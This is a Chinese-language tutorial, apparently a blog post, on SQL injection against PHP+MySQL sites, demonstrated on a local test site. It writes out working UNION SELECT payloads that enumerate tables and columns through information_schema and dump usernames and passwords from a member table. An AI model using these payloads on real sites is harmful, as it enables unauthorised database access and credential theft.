大家好,今天给大家写下如何渗透php+mysql网站,由于是测试我本地搭建了个网站
教程针对的是mysql5.0以上的版本!因为mysql5.0以上自带的有information_schema数据库,
information_schema:存储mysql下所有信息的数据库(数据库名,表名,列名)。
用的工具是apmserv
php函数:
database():数据库名
user():数据库用户
version():数据库版本
Mysql数据库结构
数据库A
表名
列名
数据
数据库B
表名
列名
数据
一、判断是否存在注入点
先用 ‘ 单引号来测试
返回不正常,接着用and 来判断
and 1=1 返回正常
and 1=2
返回错误
简单两步确认存在sql注入漏洞
二、order by
18正确
19错误(说明存在18个字段)
三、UNION SELECT 联合查询
UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
爆出的数字是2.3。我们把需要查询的函数写入2或者3上面来查询
查询数据库名 用户 数据库版本,操作系统
四、爆数据库下的所有表(数据库名需要转码)
UNION SELECT 1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from information_schema.tables where table_schema=0x6A69616E
五、爆数据库下表下的列
UNION SELECT 1,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from information_schema.columns where table_name=0x6262736D656D626572
六、爆列下的内容
UNION SELECT 1,group_concat(username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from bbsmember
账号密码都是admin